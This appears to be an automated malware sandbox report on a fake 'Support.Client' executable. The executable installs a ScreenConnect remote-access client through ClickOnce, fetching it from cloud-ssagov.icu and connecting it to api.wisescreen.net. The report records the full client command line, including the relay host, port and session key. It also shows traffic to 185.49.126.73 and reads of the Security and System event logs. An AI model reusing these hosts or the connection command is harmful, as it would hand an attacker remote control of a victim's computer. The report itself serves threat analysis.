Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA033A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.e
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA02F6000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3503405101.000001EC9E331000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA0382000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config
Source: dfsvc.exe, 00000001.00000002.3532689918.000001ECBA44B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config%8
Source: dfsvc.exe, 00000001.00000002.3532689918.000001ECBA44B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configO9
Source: dfsvc.exe, 00000001.00000002.3524248459.000001ECB8710000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe0
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA0382000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClie
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA033A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.e
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA0407000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.exe
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA033A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA027B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.exe.config
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA0382000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileMana
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA0382000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA033A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.P
Source: dfsvc.exe, 00000001.00000002.3505558952.000001ECA033A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA027B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3503405101.000001EC9E331000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.config
Source: ScreenConnect.Core.dll0.1.dr	String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
Source: svchost.exe, 00000002.00000003.1657089633.00000224B6582000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.dr, qmgr.db.2.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.2.dr, qmgr.db.2.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.2.dr, qmgr.db.2.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.2.dr, qmgr.db.2.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000002.00000003.1657089633.00000224B6582000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: svchost.exe, 00000002.00000003.1657089633.00000224B6582000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.dr, qmgr.db.2.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.2.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49755 version: TLS 1.2

E-Banking Fraud

Drops certificate files (DER)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141	Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior

Reads the System eventlog

Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior

System Summary

Detected potential unwanted application

Source: Support.Client (1).exe

PE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File created: C:\Windows\system32\user.config
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Detected potential crypto function

Source: C:\Users\user\Desktop\Support.Client (1).exe	Code function: 0_2_0042A495	0_2_0042A495
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8B0FB0	1_2_00007FFD9B8B0FB0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8B0FA8	1_2_00007FFD9B8B0FA8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B89AEF5	1_2_00007FFD9B89AEF5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8BAD85	1_2_00007FFD9B8BAD85
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B89F35E	1_2_00007FFD9B89F35E
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8AD460	1_2_00007FFD9B8AD460
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B89FA21	1_2_00007FFD9B89FA21
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8A9879	1_2_00007FFD9B8A9879
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8B28D8	1_2_00007FFD9B8B28D8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8B0FFA	1_2_00007FFD9B8B0FFA
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8A31DD	1_2_00007FFD9B8A31DD
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B891211	1_2_00007FFD9B891211
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8A3251	1_2_00007FFD9B8A3251
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B896138	1_2_00007FFD9B896138
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8B3061	1_2_00007FFD9B8B3061
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9B8A70DD	9_2_00007FFD9B8A70DD
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9B8D53D5	9_2_00007FFD9B8D53D5
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBB5C21	9_2_00007FFD9BBB5C21
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBB000A	9_2_00007FFD9BBB000A
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9BBB6E7C	9_2_00007FFD9BBB6E7C
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 14_2_00007FFD9B8A70DD	14_2_00007FFD9B8A70DD
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 14_2_00007FFD9B8A10D7	14_2_00007FFD9B8A10D7
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 14_2_00007FFD9B8A10CF	14_2_00007FFD9B8A10CF
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 14_2_00007FFD9BBB743C	14_2_00007FFD9BBB743C
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 14_2_00007FFD9BBBE9AC	14_2_00007FFD9BBBE9AC
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 14_2_00007FFD9BBB30C0	14_2_00007FFD9BBB30C0
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 14_2_00007FFD9BBB0790	14_2_00007FFD9BBB0790
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 14_2_00007FFD9BBBF75C	14_2_00007FFD9BBBF75C
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 14_2_00007FFD9BBB65F6	14_2_00007FFD9BBB65F6

One or more processes crash

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6884 -ip 6884

Uses 32bit PE files

Source: Support.Client (1).exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ScreenConnect.Windows.dll.1.dr, WindowsToolkit.cs	Cryptographic APIs: 'CreateDecryptor'
Source: ScreenConnect.Windows.dll0.1.dr, WindowsToolkit.cs	Cryptographic APIs: 'CreateDecryptor'

Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'

Source: ScreenConnect.Windows.dll0.1.dr, WindowsExtensions.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: ScreenConnect.Windows.dll0.1.dr, WindowsExtensions.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ScreenConnect.Windows.dll0.1.dr, WindowsExtensions.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal54.evad.winEXE@19/75@3/2

Source: C:\Users\user\Desktop\Support.Client (1).exe

0_2_00421000

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

File created: C:\Users\user\AppData\Local\Deployment

Jump to behavior

Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6884
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

File created: C:\Users\user\AppData\Local\Temp\Deployment

Jump to behavior

Source: C:\Users\user\Desktop\Support.Client (1).exe

Command line argument: dfshim

0_2_00421000

Source: Support.Client (1).exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Source: C:\Users\user\Desktop\Support.Client (1).exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Support.Client (1).exe "C:\Users\user\Desktop\Support.Client (1).exe"
Source: C:\Users\user\Desktop\Support.Client (1).exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe"
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"
Source: unknown	Process created: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "a26a4531-970e-49ee-adc5-025b684e5b57" "User"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6884 -ip 6884
Source: C:\Users\user\Desktop\Support.Client (1).exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 320
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "a729bf7b-fc8b-4b7f-a944-3b6cfbd7ef10" "System"
Source: C:\Users\user\Desktop\Support.Client (1).exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe"	Jump to behavior
